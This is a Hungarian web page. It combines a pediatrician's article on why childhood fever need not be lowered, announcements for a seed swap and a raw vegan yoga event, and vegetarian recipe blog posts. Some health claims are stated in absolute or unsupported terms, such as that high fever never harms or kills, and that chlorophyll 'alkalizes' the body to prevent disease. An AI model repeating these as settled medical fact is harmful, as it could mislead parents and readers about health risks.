Szijjártó László A láz nem káros és nem veszélyes! Csillapítani nem kell, csak lehet! A lázcsillapítás célja a gyermek közérzetének javítása. A hűtőfürdő és priznic többnyire csak gyermekkínzás, ezért a világ fejlett országaiban már sehol sem javasolt! A lázat a múltban veszélyes tünetnek tartották mind a betegek, mind az orvostudomány. Az infekciók eredményes kezelésével és megelőzésével a láz mára Európában és a gazdaságilag fejlett országokban többnyire enyhe lefolyású vírusfertőzések kísérő tünete. Az elmúlt évtizedek kutatásai bizonyították a láz egyértelműen hasznos szerepét a fertőzéssel szembeni harcban. Eddig nem jelent meg olyan orvosi közlemény, mely a gyermekkori fertőzéseket kísérő gyakran magas láz káros vagy veszélyes voltát igazolná. Ezzel szemben tudományos vizsgálatok bizonyítják, hogy lázcsillapítók adásával nem lehet megelőzni a kisgyermekeknél gyakran előforduló lázgörcsöt. Ma már lázgörcs esetén sem adnak lázcsillapítókat és egyáltalán nem javasolják a lázgörcsös gyermek hűtését fizikai módszerekkel. A világ azon országaiban (Kanada, Hollandia), ahol az orvosok igyekeznek tudományosan igazolt tényekre alapozni a mindennapi gyógyítás gyakorlatát már évtizedek óta felhagytak a láztól való indokolatlan, de hosszú hagyományokkal rendelkező félelmektől vezérelt agresszív lázcsillapítási gyakorlattal. Más országokban, így hazánkban is ezek a változások sokkal lassabbak, vagy még el sem kezdődtek. Ha Önök egy internetes keresőben a lázcsillapításról szeretnének információt, akkor sajnos még valószínűleg évekig már rég elavult, a modern orvosi szemlélettel ellentétes ajánlásokat fognak nagy tömegben találni. Nehezen fogják tudni eldönteni, hogy kinek higgyenek. Helyzetüket külön megnehezíti, hogy a hazai orvosok, egészségügyi dolgozók többsége is még a régi szemléletben nevelkedett, s így tőlük is a már túlhaladott lázfóbiás tanácsokat hallhatják. Nézzük azokat a tényeket, melyek a lázról való orvosi nézetet és a lázcsillapitási gyakorlatot megváltoztatták. Mi a láz? A láz a normális (36,5-37C foknál magasabb) testhőmérséklet (magasabb, mint 38-38,5C fok), melyet az agyunk hőszabályozó központjának lázkeltő anyagokkal (pyrogének) való ingerlése okoz. Ez leggyakrabban fertőzések, jóval ritkábban daganatok vagy autoimmun betegségek kapcsán jelentkezik. A lázat a szervezetünk fokozott hőtermeléssel és a hőleadás csökkentésével éri el. Ha testhőmérsékletünk magasabb, a kórokozók nagy többsége rosszabbul szaporodik ugyanakkor szervezetünk védekező (immun-) rendszere hatékonyabban küzd ellenük. Vigyázzunk, hogy ne keverjük össze a lázat a hőpangással (hyperthermia), amikor testünk túlmelegedését külső hőforrás okozza (pl. a nap a zárt autóban hagyott kisgyermeknél). Ez esetben a helyes kezelés a test hűtése. A testhőmérsékletet kisgyermekeknél végbélben, nagyobbaknál hónaljban vagy a szájban, esetleg a fülben mérhetjük manapság már digitális hőmérőkkel. Lehet-e káros a láz? Nem, a láz a régi hiedelmekkel ellentétben nem káros és nem veszélyes. A magas láz sem. Nem okoz agykárosodást, nem terheli túl a szervezetet és nem okoz halált. Nem emelkedik spontán 41,7 fok fölé. A lázzal járó szaporább légzés, szívműködés nem veszélyes, és a magasabb testhőmérsékletet biztosító fokozott energiatermelés sem megterhelőbb, mint az intenzív játszás vagy sportolás. A lázgörcsről Hosszú évekig az orvosok is azt hitték, hogy a láz fiatal gyermekeknél görcsöt okozhat. Ezzel szemben az az igazság, hogy ma sem tudjuk pontosan, mi a lázgörcs oka. Azt viszont már biztosan tudjuk, hogy a lázgörcs (lázzal együtt jelentkező, hosszabb-rövidebb ideig tartó eszméletvesztés gyakran izomrángásokkal) bár nagyon riasztó, de egyáltalán nem veszélyes, és lázcsillapítók adásával vagy a test hűtésével nem szüntethető és nem is előzhető meg. Ezért ma már a 3-5 percnél hosszabb lázgörcs kezelésére csak görcsoldót javasolnak, lázcsillapítót vagy fizikai hűtést nem. A legtöbbször a görcs magától elmúlik pár perc alatt. Kell-e csillapítani a lázat? A válasz a fenti kérdésre ma már egészen más, mint amit hosszú évtizedekig nagy erőkkel próbáltak orvos- és védőnő-nemzedékek nagyszüleinkbe és szüleinkbe belénevelni, és amit sajnos még manapság is gyakran hallunk. A lázat nem kell csillapítani. Sem gyógyszerrel, és különösen nem hűtőfürdővel vagy vizes borogatással vagy bármely más eljárással, amit gyermekünk kellemetlennek, esetleg rettenetesnek találhat. Ma már a lázas gyermek felébresztését és fizikai hűtését értelmetlen kínzásnak tartjuk. Mit tegyünk, ha gyermekünk lázas? Próbáljuk meg a betegséget gyermekünk számára elviselhetőbbé tenni és ügyeljünk, hogy időben észrevegyük, ha gyermekünk súlyos betegség tüneteit mutatja. Adjunk neki gyakrabban inni. Ne erőltessük az evést. Hagyjuk, hogy a számára legkellemesebb helyet és helyzetet megtalálja. Ne erőltessük ágyba, ne öltöztessük fel vastag ruhákba, ne takarjuk be meleg paplanokkal, amik a hőleadást gátolhatják. Adjunk rá könnyű, laza ruhát és szellőztessünk a szobájában. De ha fázik, átmenetileg takarjuk be melegen. Mindenképpen fordítsunk rá több figyelmet, szeretetet, gondoskodást. Három hónaposnál idősebb gyermeknek adhatunk lázcsillapító orvosságot, ha rosszul érzi magát vagy fájdalma van. Ilyen esetben nagyon ügyeljünk a helyes adagolásra! Ha a láz mégsem csökken, az nem jelenti azt, hogy gyermeke súlyos beteg és nem szükséges, hogy azonnal orvoshoz vigye... Viszont nagyon fontos, hogy tájékozódjon, milyen panaszok, tünetek esetén kell lázas gyermekét azonnal orvoshoz vinnie vagy legalábbis tanácsot kérnie! Ezzel kapcsolatos információt orvosától kaphat vagy a home.hetnet.nl oldalra kattintva bővebben olvashat a lázról. Névjegy:dr. Szijjártó László gyermekgyógyász Gyermekgyógyász specialistaként dolgozom 1996 óta egy holland városkában, odahaza többek között a pécsi gyermekklinikán és a svábhegyi gyermekgyógyintézetben tevékenykedtem. Elsősorban asztmával, ételallergiával foglalkozom, de emellett a gyermekgyógyászat teljes spektrumát gyakorlom. 2006-tól próbálom a magyar gyermekgyógyász társadalomban a láztól való indokolatlan félelmet eloszlatni és elősegíteni a modern, tudományosan megalapozott nézetek és gyakorlat elterjedését.
Tankert műhely és Magbörze! FEBRUÁR 23. MüSZi - a Corvin Áruház 3. emeletén.
Szívügyem a kis kertészek nevelése és a magok megbecsülése. Jelentkezzetek a kertésznevelőnek vagy hozzatok magokat! TANKERT MŰHELY Február 23. 10.00 - 16.00 Kertésznevelde Jelentkezés határideje: február 18 . A műhely helye: Művelődési Szint (MüSzi)! A Zöld Fiatalok Egyesület a KÉK és a Grund Kert együttműködésében KERTI TANPROGRAMOT indítunk a Leonardo kertben, tankert létesítésével. A tankertben általános és középiskolai osztályokat fogadunk, kiemelt célcsoportunk a 8-11 éves korosztály. Számukra egy külön kiadvány készül, a Kerti Mozaik. A Tankert műhelybe olyan érdeklődőket várunk, akik a jövőben szeretnének segítőként vagy oktatóként bekapcsolódni a programba. A Kerti Mozaik témáit feldolgozva csoportosan olyan eszközök kidolgozásán munkálkodunk, amelyek segítségével könnyebben átadhatóakká válnak a városi kertészkedés fortélyai a gyerekek, fiatalok számára. Ha csatlakoznál a programunkhoz, és részt szeretnél venni a műhelyfoglalkozáson jelentkezz február 18.-ig a kertiorak@zofi.hu címen. További információkkal is ezen keresztül szolgálhatunk! MAGBÖRZE Február 23-án 16.00-18.00 a ZöFi magbörzét szervez! Vetőmagok csere-beréje biogazdálkodók, hobbikertészek és érdeklődők számára... o Ha fontosnak tartod, hogy a te kezedben legyen az élelmed forrása o Ha több magod van, mint amennyit el tudsz vetni o Ha van a tarsolyodban néhány tájfajta még az öreganyáinktól o Ha szeretnél néhány új fajtát kipróbálni o Ha ki szeretnéd próbálni a kertészkedést, de nem tudsz elindulni o Ha érdekel a fenntartható élelmiszertermelés kérdése Továbbá: magfogási technikákról, ültetésről hallhatunk ötleteket, tapasztalatokat. Várunk minden városi és nem városi kertészt, aki a palántázás és ültetés időszakát azzal kezdené, hogy kicsit változatosabbá teszi magtárát. Hozz magokat és cseréld el! Helyszín: MüSzi - Művelődési szint, a Corvin Áruház 3. emeletén. 1085 Budapest Blaha Lujza tér 1. (Corvin áruház III. emelet, Bejárat a Somogyi Béla utca felől) A program a Vidékfejlesztési Minisztérium támogatásával és a Közösségi Tanulókert Hálózat program segítségével valósul meg. Partnerek: Magyar Nemzeti Vidéki Hálózat Vidékfejlesztési Minisztérium Magyar Idegenforgalmi és Területfejlesztési Közhasznú Egyesület Messzelátó Egyesület Művelődési Szint (MüSzi) Kortárs Építészeti Központ Alapítvány (KÉK) Grund Kert
Nyers Vegán Ashtanga Parti! Április 20 szombat
2013. február 3. Nyersétel akadémia
Nyers Vegán Ashtanga Party az Atma Centerben! Házigazdák: Lénárt Gitta és Gauranga Das. Szereted a nyers ételeket és az Ashtanga-jógát? Vagy esetleg nem próbáltad még egyiket sem? Akkor itt a remek alkalom, hogy alaposan megismerd mindkettőt! Lépjünk a tettek mezejére az újévi fogadalmainkkal kapcsolatban, és tegyünk valami konkrétat az egészségünk érdekében! Az Ashtanga vinyásza jóga korunk egyik legfelkapottabb jógairányzata, amely ugyanakkor egy autentikus és élő tradíción alapul. Az Ashtanga gyakorlása az egyik leghatékonyabb eszköz egészségünk, fiatalosságunk, rugalmasságunk és állóképességünk fenntartására. Jó kiegészítő más sportágakhoz, de önmagában is nagyon hatékony eszköz arra, hogy kihozd a maximális potenciált a testedből és az elmédből is. Az Ashtanga Party egy full vinyászás első sorozat-gyakorlással kezdődik Gauranga Das vezetésével. Ha még sohasem voltál, és azt sem tudod, mi ez, akkor se aggódj, időben ki fog derülni, hogy mik a feladatok. Hozz magaddal könnyű jógaruhát és egy nagy strandtörülközőt. A nyers vegán étkezés világszerte egyre ismertebb és elismertebb, ami nem csoda, hiszen a legtöbb ember szervezete már kimerült az agyonfeldolgozott mesterséges élelmiszerektől, és éhezi az élő ételeket. A jóga-gyakorlók általában tudatosabban odafigyelnek táplálkozásukra, így sokan közülük is előnyben részesítik a nyers vegán fogásokat. Évezredek tapasztalata azt mutatja, hogy az ember egészségesen tud élni hús nélkül, de növényi táplálék nélkül nincs esélye az életben maradásra. Tehát ha nem vagy vegetáriánus, akkor is érdemes belekóstolni a bőséges nyers vegán lakomába, amit a magyar nyersvegán mozgalom nagykövete, Lénárt Gitta fog elkészíteni. Mielőtt nekiesünk és mindent elpusztítunk a kiadós jógázás után, Gitta azt is el fogja mondani, hogy mik a nyers vegán táplálkozás előnyei, és milyen trükkökkel tehetjük változatossá és teljes értékűvé nyers falatainkat. Nyers Vegán Ashtanga Party az Atma Pestben (1085 Üllői út 6.) Időpont: 2013. április 20, szombat. 15-17-ig Ashtanga-jóga Gauranga Dassal (Első sorozat teljes vinyászával + extra hátrahajlító szett) 17-19-ig Nyers vegán lakoma Lénárt Gittával, előadással, beszélgetéssel. Részvételi díj: 5000 Ft. A helyek száma korlátozott, jelentkezni január 24-ig lehet a részvételi díj befizetésével az Atma Center Pest vagy Buda recepcióin. További info: atmacenter.hu
Narancslekvár és uramatyám a Bocuse dOr versenyen
2013. január 30. Zizi kalandjai
(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = //connect.facebook.net/en_US/all.js#xfbml=1&appId=467459323271844; fjs.parentNode.insertBefore(js, fjs); }(document, script, facebook-jssdk)); Amikor a Dolce Vita Konyha webáruháztól megrendeltem a 12 kg szicíliai kezeletlen héjú vérnarancsot, reméltem, hogy finomak, lédúsak és fotogének lesznek! :) Mindez teljesült! A belsejük nem vérvörös, inkább pirosba hajló narancsos, ízre enyhén savanykásak, de csak annyira, hogy nem húzza össze a szánkat. Nem vagyok egy nagy befőzős típus, na nem azért, mert nem akarnám vagy szeretném, hanem azért, mert egy mini konyhánk van kamra nélkül és a sok-sok finomságot nem tudnám hova tenni. Azért néha teszek kivételt - például amikor marokkói sóban eltett citromot készítettem vagy életem első lekvárját eperből... ezekkel a csodaszép narancsokkal sem történt ez másképp. Életem első narancslekvárját Angliában kóstoltam. Náluk nagyon népszerű az orange marmalade, itthon viszont kevés helyen kapható. Kutattam a neten receptek után, olyat akartam főzni, amibe nem kerül több kiló cukor és egyéb felesleges hozzávaló sem. Szerencse, hogy Éva kirakott nemrég a blogjára egy receptet. Vele való konzultáció után úgy döntöttem, hogy belevágok. Este kezdtem hozzá, éjjel 1-kor töltöttem az üvegekbe a lekvárt, de megérte. --- A blogbejegyzés írása közben lezajlott a 2013-as Bocuse dOr verseny és eredményhirdetése is. Az elmúlt két napban igyekeztem online követni az eseményeket. A magyar csapat - Széll Tamás, Garai Ádám, Hamvas Zoltán, Bíró Lajos - a 10. helyezést szerezte meg a szakácsversenyek olimpiáján, Lyonban! Fantasztikus teljesítmény, pláne úgy, hogy Magyarország életében először jutott ki erre a rangos eseményre, amelyet 1987 óta rendeznek meg!!! Plusz a legjobb plakát díját is Magyarország nyerte az internetes szavazás eredményeként! Egyébként én a 6-10. helyezésben reménykedtem... persze csodás lett volna, ha nyerünk, de már így is benne vagyunk a világ legjobb 24-ében, ráadásul úgy, hogy ezzel a 10. hellyel felkerültünk a világ gasztronómiai térképére! :) A végleges eredmény: 1. Franciaország, 2. Dánia, 3. Japán, 4. Nagy-Britannia, 5. Norvégia, 6. Svédország , 7. Egyesült Államok, 8. Izland, 9. Kanada, 10. MAGYARORSZÁG... Gratulálok a nyerteseknek és a magyar csapatnak a fantasztikus helytállásért! Még több infó a versenyről és felkészülésről: itt, itt, itt, itt és itt. És akkor jöjjön a narancslekvár... Narancslekvár Hozzávalók: - 2 kg kezeletlen héjú narancs - 400 g nádcukor - 250 ml víz - 1 rúd vanília, kis darabokra vágva (ahány üvegbe töltjük a lekvárt, annyi darabra vágtam fel) A narancsokat mossuk meg alaposan, töröljük szárazra és késsel vagy hámozóval vékonyan hámozzuk le a héjukat úgy, hogy a fehér része ne kerüljön bele. Az így kapott narancshéj darabokat tegyük egy tálba, öntsük fel annyi vízzel, amennyi ellepi és hagyjuk állni két óráig. Közben a narancsokat hámozzuk meg teljesen, tisztítsuk meg a fehér hártyától amennyire tudjuk és vágjunk vékony karikákat belőlük. Tegyük egy nagy lábasba a cukorral együtt és tegyük félre. A beáztatott narancshéjakról öntsük le a vizet, vágjuk nagyon vékony csíkokra és adjuk hozzá a cukrozott narancshoz. Öntsük fel a vízzel (250 ml) és alacsony lángon kezdjük el főzni. Néha keverjük át. Nekem kb. két és fél óra után kezdett el besűrűsödni. Ha esetleg egy kicsivel kevesebb vizet (200 ml) adunk hozzá, akkor szerintem már hamarabb elkezd sűrűsödni. Amikor eléri a lekvár állagot, kezdjük el óvatosan belekanalazni a tiszta, fertőtlenített üvegekbe. Mindegyik tetejére tegyünk egy darabka vaníliarudat, zárjuk le, majd száraz dunsztban hagyjuk kihűlni. Nekem ebből a mennyiségből két 440 ml-es és két 230 ml-es üveg lett tele, plusz maradt egy kevés kóstolni való. Tipp: ezzel a mennyiségű cukorral a lekvár édes, de enyhén savanykás lett. Legközelebb szerintem még kevesebb cukrot (kb. 300-350 g) teszek bele, hogy a savanykás íze még jobban megmaradjon. Mi pirított kalács szeletekre kenve ettük először. Mondanom sem kell, mennyei!
Új sláger a kelchipsz
2013. január 20. Gitta nyersétel blogja
Novemberben készítettünk először kelchipszet a Nyersétel Akdémián, és a novemberi menüben már lehetett is rendelni a Vegafood kiszállításában az aszalványok között. Óriási sikere volt, nem győztük aszalni... mindenki odavolt érte, aki csak megkóstolta. Azóta több helyen is láttam, hogy mások is elkészítették, nagyon örültem neki, hogy egyre többen ismerhetik így meg ezt a fantasztikus ételt. Amikor először hallottam róla, azt gondoltam, hogy na ez az, amit neeeem, ezt nem fogom megcsinálni..., és amikor először kóstoltam, teljesen elcsodálkoztam, mert nem azt kaptam, amit vártam. Megdöbbentően finom. Ropogós, és ha a szószt finomra készítetted, akkor az az íz lesz a domináns, a kelkáposzta pedig a hordozója. Szóval elég a sok beszédből, nézzük a lényeget. Még aszalás előtt Kelkáposzta chipsz 1 kg kelkáposzta 10 dkg napraforgó vagy más mag, ízlés szerint hagyma, paprika, aszalt paradicsom, szintén ízlés szerint 3 dkg magyaros fűszerkeverék (Íz-Tár) vagy más fűszer ízlés szerint kevés víz Megszárítva A kelkáposztát megmossuk, jól leszárítjuk, majd falatnyi darabokra vágjuk, egy nagy tálba tesszük. A napraforgót a vízzel turmixgépben simára keverjük a zöldségekkel, ételízesítővel. Használhatunk bármilyen ízesítést, olaszost, kínait, pikánsat, csípőst... A szószt dolgozzuk bele kézzel a kelkáposzta leveleinek ráncai közé. Lehetőleg egyenletesen, jusson a teljes felületre. Ezután tegyük a káposztát aszalógépbe, és szárítsuk meg ropogósra. Egészséges nassolnivaló, ropogós, ízes! Azon ne csodálkozzatok, hogy a kiló káposztából alig 10 dkg aszalvány lesz, a magok tömege nem változik. Sok munka, és egy marék chipsz... de megéri!
Heti saláta ötlet: zelleres, datolyás narancssaláta
2013. január 14. Napló étkeinkről, életünkről
Tegnap nagyobb fiammal készítettük ezt a salátát, és mindkettőnket meglepett, milyen finom lett. Ételkészítésnél hagyom gyermekeimet kibontakozni, a lányom például finomabb gluténmentes tortákat süt, mint amik a kereskedelemben kaphatók. Jobban belegondolva, érdemes volna közzétenni receptjeit... Visszatérek a salátához. Összetétele nagyon egyszerű: 1 kisebb zeller, 4 nagy narancs, és magozott datolya. A zeller reszeléséhez a karácsonyra kapott végtelen reszelőmet használtam, a narancs és a datolya feldarabolásához egy kés is elég volt. Ez az étel azok közé tartozik, amiknek jól jön egy kis állásidő, mert összeérnek az ízek: a narancs savassága lágyította a zellert, a datolya édessége is szétterjedt, és a zeller fűszeressége átjárta az alkotórészeket! A reszelőmről, ami magyar termék német pengével, az alábbi oldalon látható egy kis film: (a film 2. felében van szó a Julienne reszelőről, és a spirálozási lehetőségről) Mediterranean Julienne Peeler Nagyon megörültem, amikor a karácsonyi vásárban találtam ezt az eszközt, mert 2 oldalas spirálozót 7000 forint alatt nem láttam, ez ugyan csak 1 méretű Julienne-t tud, de 5500 forintért árulták, és másra is használható :-) A filmben látható akkus csavarhúzó nem jár mellé, de én eddig kézzel is könnyen boldogultam!
Lencsecsíra
2013. január 3. Gitta nyersétel blogja
Újév napján főztetek lencsét? Főztem én is a családnak, egy kis marékkal pedig kicsíráztattam. 2 evőkanálnyi mag volt, a csírák pedig kinőtték a tálat, amiben csíráztak, a sokszorosára megnőttek! A lencsecsíra nagyon egészséges, tudtátok, hogy a csírák gyógyító hatását már az ókorban felfedezték? A csírák telis-tele vannak ásványi anyaggal, vitaminokkal, rostokkal, növényi fehérjével és telítetlen zsírsavakkal valamint enzimekkel.. Gyulladáscsökkentők, kiváló csonterősítők, és segítik az érvédő koleszterin termelődését. A lencsecsíra tele van értékes aminosavakkal, kiváló fog- és immunrendszer erősítő. És nem utolsó sorban, a hagyomány szerint, aki újév napján lencsét eszik, lesz sok pénze... :) Sokféleképpen lehet elkészíteni, csak egyet ne tegyetek! A lencsecsírát ne főzzétek meg! Most legutóbb két könyvben is olvastam, hogy milyen nagy jelentősége van az enzimeknek, és annak, hogy a zöldségeket, de főleg a csírákat nyersen együk. És ugyanezekben a könyvekben a következő receptben azt írják, hogy főzzük 20 percig... (????? ezt ki magyarázza el nekem??????) Lencsecsíra saláta Lencsecsíra saláta 1 adag 1 csésze lencsecsíra (ez egy jó nagy marék) 1/2 kápia paprika kockákra vágva 1/2 lilahagyma kis kockákra vágva 1 evőkanál lenmagolaj (vagy más, hidegen sajtolt) 1 kávéskanál curry por csipet só A zöldségeket összekeverjük a csírával, és tálba tesszük. Az olajban elkeverjük a sót és a curryt, és a salátára öntjük. Már ehetjük is. Az íze mellett az illata is nagyon finom.... Próbáljátok ki!
Fóliában sült szójavagdalt kápia paprikával
Néha napján férjemre várakozva be-be tévedek egy-egy könyvesboltba, ahol magamba szívom mindazt, ami érdekel. Át és átlapozok különféle irodalmat, amire egyrészt alig jutna máskor időm, másrészt, pénzt nem szívesen adnék ki ezekért a könyvekért. Tévedés ne essék, olvasok rendszeresen. Most az egyik könyv például a Nyers étel csodája, amit bánom, hogy nem nyáron vettem kezembe, vagy jobban mondva töltöttem fel a mobilomra, mert elektronikus formában szereztem meg, így utazásaim közben (pl. munkába menet) szívesen olvasom. Na de a könyvesboltokra visszatérve - azokat a szakácskönyveket is átlapozgatom, amelyek telis-tele vannak húsos ételekkel. Vagy nem kizárólag azokkal. Például legutóbb Hegyi Barbara és Kulka János szakácskönyveit nézegettem. Mindkettőt nagyon kedvelem. Barbarát már jó néhány darabban láthattam. A hangja egy megismételhetetlen fűszer a magyar színészgárdában. :) Van még néhány ilyen jellegzetes hang, arc, tehetség. Úgy gondolom, mindkettőjük - Kulka és Hegyi - nem manapság divatos celebek, hanem a tényleges tehetségükkel, művészetükkel íródtak be az emberek tudatába. Szóval ilyesmi - képekkel, út-, vagy élményleírásokkal gazdag könyvekből nagy ritkán "ötletet lopok". Így született meg a mostani remekművem is. Minőségét jelezte, hogy odáig volt érte a férjem. (Ja, és azt hiszem, nem a fent említett emberek tollából loptam az ötletet, hanem egy harmadik szakácskönyvből, ahol darált hússal készítette el a szakács.) A recept: Hozzávalók: 1 csomag (20 dkg) szójagranulátum 1 nagyobb marék (vagy valamivel több) zabpehely 4 evőkanál sörélesztő pehely 1 hagyma 3-4 gerezd fokhagyma 1 piros színű kápia paprika (vagy kaliforniai) 1 zöld színű kápia paprika (vagy kaliforniai) zeller zöldje petrezselyem levél ételízesítő alufólia víz olaj Elkészítés: A szójagranulátumot ételízesítős meleg vagy forró vízben áztatjuk legalább fél órát, de akár többet is. Amikor megpuhult és átjárta az ételízesítő íze, átszűrjük, kinyomkodjuk, de a levét megtartjuk, nem öntjük ki!!! A szójagranulátumot egy kevés vízen megfuttatott hagymával összekeverjük, kicsit átfőzzük, hozzáadjuk a fokhagymákat is. (Hozzányomjuk, vagy apróra vágva.) A paprikákat apróbb darabokra felvágjuk, szintén a szójához adjuk, a zeller zöldjét és a petrezselyem leveleket apróra vágva szintén belekeverjük. Sörélesztő- és zabpehely kerül még hozzáadásra. Annyi zabpelyhet kell hozzáadni, hogy a szója nedvességét jól felszívja, és az egész massza összeálljon, képesek legyünk nagyobb gombócokat formálni belőlük. Tepsink hosszának megfelelő méretben alufóliából egy nagyobb darabot letépünk. Erre halmozzuk rá a massza egy részét (felét), úgy, hogy rudat tudjunk formálni belőle a kezünkkel. Amikor a rúd egybeállt, egy kevés olajat végigcsurgatunk rajta, majd az alufóliával betakarjuk és a tepsibe tesszük. A maradék masszával hasonlóan járunk el. Amikor mindkét rudunk a tepsiben pihen, a szójából leszűrt fűszeres folyadékkal felöntjük a tepsit és sütőben kb. 35 perc alatt készre sütjük, jobban mondva pároljuk. A lé nagy része elpárolódik, elfő alóla, ha mégis marad, akkor azt már nem használjuk fel. A fóliákat szétnyitjuk, kicsit engedjük, hogy a maradék gőz és pára távozzon, majd amikor már nem túl forró, egy óvatos, de gyors mozdulattal, a fólia segítségével átemeljük a tálcánkra vagy tálunkra a kész vagdaltat. Krumplipüré és sok sok saláta fogyott hozzá. Máskor is el fogom készíteni. Szerintem még ünnepekre, vagy karácsonyra, húsvétra is kitűnő vendégváró falat.
Töltött fekete retek (vegán)
2012. december 3. Dulmina tündérkonyhája
Sokáig nemigen vettem fekete retket, mert nyersen nem kedvelem erős ízét. Megfőzve vagy megsütve azonban sokat ,,szelídül". Állagában a karalábéra emlékeztet így, ízre azonban sokkal karakteresebb, ezért önmagukban jellegtelenebb hozzávalókat érdemes mellétenni. Ebbe a töltött változatba gabonapehely és kenyérmorzsa került, a retekhez illő, magyaros jellegű fűszerezéssel. A hagyományos vonalra
ZÖLDség
A magyar nyelv gyöngyszeme ez is szerintem! Együnk sok ZÖLDséget! Nap mint nap halljuk, igaz? Milyen zöldségekre gondolunk ilyenkor elsősorban? Paprikára, paradicsomra, répára, retekre, uborkára … stb. (bár ezek közül is néhányat, amiket mi még zöldségként tanultunk, már többjüket sorolja a tudomány a gyümölcsök kategóriájába) Vajon eszünkbe jut-e első hallásra, hogy a magyar nyelv azt (is) kívánja sugallni, hogy ZÖLD növényt (is) fogyasszunk? ZÖLD, klorofillban gazdag növényt, ZÖLDséget…. és ezzel a lúgosításnak, a sav-bázis egyensúly helyreállításának, a betegségek megelőzésének, az egészség megtartásának egyik remek módját is megkapjuk anyanyelvünk “mély”értelmezése során. Milyen zöldekre gondolok? Bármilyen ehető fűszernövényre, ehető gyógy- vagy gyomnövényre: petrezselyem, zeller levél, bazsalikom, citromfű, menta, spenót, sóska, brokkoli, cékla levele, sárgarépa levele, csalán, tyúkhúr, parlagfű, lucerna levél, mángold, leveles kel, saláta, kövér porcsin, búzafűlé, stb. – a lényeg az éltető ZÖLD, A KLOROFILL! A zöldekről, a klorofill csodálatos hatásairól itt olvashatsz: http://www.fittnok.hu/csodalatos-gyogyito-klorofill A ZÖLDség fogalmát tehát ne merítsd ki egyszerűen a nem zöld zöldségek területén. Mindennapi ZÖLDséged legyen ZÖLD is!!!!
tudatosság & curry
2012. november 21. Vegasztrománia
egyensúlyozom a tudatos étkezés és az elfoglaltságaim között. baromira észnél kell lenni, ha a munka és az egyéb vállalt tevékenységek mellett oda akarunk figyelni arra, hogy normális dolgokat együnk, és ne csak bekapjunk valamit útközben, kutyafuttában. szoktam én is, de hálistennek egyre kevesebbet, vagy igyekszem a lehetőségekhez képest több tápértékkel és kevesebb szeméttel rendelkező kaja-pótlékokat választani. a lényeg, hogy lehet benne fejlődni! tavaly egy dolgozósabb időszakban sikerült nem túlságosan odafigyelnem a bevitt táplálékok értékes tartalmaira, ennek az lett a vége, hogy legyengült az immunrendszerem, és elkapott egy vírus. idén ezt nem engedem. az is jó lenne, ha egy hétre előre tervet tudnék készíteni, hogy mikor mit főzök majd, de ennél sajnos hangulatemberebb vagyok, általában azt szeretek enni, amit megkívánok. amire viszont oda szoktam figyelni, az az, hogy cserélődjenek a hozzávalók otthon, vagyis legyen jelen a változatosság. figyelek például a színekre. minden szín más vitamincsoportot jelent, ezért, ha sokszínű a tányérunk (értsük jól), azzal elég jót teszünk magunknak. de arra is felfigyeltem már, hogy valamikor a narancssárga ételeket kívánom, valamikor a lilát, stb. nyilván ez sem véletlen, biztos valami hiányt pótlok vele. ha figyelünk ezekre a jelekre, szerintem jó úton vagyunk. azért megadom a lehetőséget annak is, hogy azt kívánjam meg, ami éppen otthon van (simone weil jutott eszembe - "meg kell tanulnunk vágyakozni az után, ami a miénk."), és ez is elég jól szokott sikerülni. hétfőn például belenéztem a hűtőbe és a zöldséges kosaramba, abból a minimál választékból főztem, amit találtam: néhány szem gomba, egy fél cukkini, egy sütőtök. (hagyma, fokhagyma alap, és elég sok fűszerem van itthon, egy vega fegyvertárához hozzátartozik) felvillant a tócsni gondolata, egy magyarosabb pörkölt lehetősége, illetve egy klasszikus sütőtökkrémleves gombás-cukkinis golyókkal, de végül az egyszerűség és a fűszeresség döntött. curry megpucoltam és apróra vágtam egy hagymát és 2 fokhagymát. elkezdtem sütni. a sütőtök egy részét használtam csak fel, meghámoztam és felkockáztam, majd rádobtam a hagymára. megtisztítottam a gombát, negyedekre vágtam és az is ment a sütőtökhöz. negyed-karikákra vágtam a cukkinit, és azt is hozzáadtam a keverékhez. sóztam, borsoztam, fűszereztem (késhegynyi fahéjjal, gyömbérrel, chilivel, tandoori masalával, garam masalával). hozzáadtam egy kevés vizet (max 100 ml), mert nem eresztett elég levet. nem pároltam agyon, sőt, a sütőtökdarabok egy hajszállal keményebbek maradtak, mint szoktam. a végén egy körtét feldaraboltam és hozzákevertem. tálalásnál görög joghurtot tettem a tetejére (azt kívántam meg, nna).
Mi a valódi, igazi étel?
2012. november 14. Zizi kalandjai
Mi a valódi, igazi étel? Honnan jön az alapanyag, mit tartalmaz, hogyan készítjük el, kivel osztjuk meg? A fenti szöveges ábra (igaz angolul), de elég jól elmagyarázza. Maximálisan egyetértek minden mondatával! És ti?
Sok zöldséges pizza
2012. november 11. Fittanyuka Blog
Gluténmentes, szénhidrát-csökkentett, élesztőmentes - anticandidás, magas rosttartalmú Szegény pizzát sok atrocitás éri, hogy nem tartozik az egészséges ételek közé, pedig csak az alapanyagok kiválasztásán múlik, hogy egészséges lesz-e a végeredmény vagy sem?! Emlékszem, hogy amikor először ettem Olaszországban pizzát csodálkoztam, hogy milyen vékony a tésztája és a húsmentes változaton a brokkolitól kezdve a spenótig telis-tele volt rakva zöldségekkel. Hidegen sajtolt olíva olajjal meglocsolva, friss bazsalikommal, az volt életem legfinomabb pizzája:) Az alábbi recept gluténmentes, hogy azoknak is kedvezzünk akik valamilyen oknál fogva nem fogyasztják a gluténtartalmú ételeket. Habár ha nincsen érzékenység bátran fogyaszthatjátok a tönkölylisztet , akár a pizza tészta elkészítéséhez. A tönköly kivételesen gazdag ásványianyagokban, növényi fehérjékben és nem utolsó sorban a magyar ősgabona! Nem egyenlő a sima búzaliszttel. Tehát a mi gabonánk, amely az itt élő emberek egyik értékes tápláléka. Tönkölylisztből készült pizza tészta recept: Itt! A fenti pizzát este is fogyaszthatjuk, én több zöldséget pakoltam rá, mint maga a tészta vastagsága. Hozzávalók: ( 4 fő részére) Tészta: 150 g mandula liszt 150 g kölesliszt 100 g rizsliszt 100 ml kókusz olaj 1 kk himalaya só 1 zacskó foszfátmentes sütőpor 2 evőkanál útifűmaghéj őrlemény ( ez egy magas rosttartalmú növény), ennek hozzáadásával a tészta kevésbé lesz száraz, morzsalékos. 100 ml víz: a vizet apránként adagoljuk hozzá, mert az útifűmaghéj miatt gyorsan magába szívja a nedvességet. Először összekeverjük a száraz összetevőket, majd jöhet az olaj és a víz. Lehet, hogy szükséges lesz még hozzáönteni kevés vizet, mert a növényi rostok sok nedvességet magukba 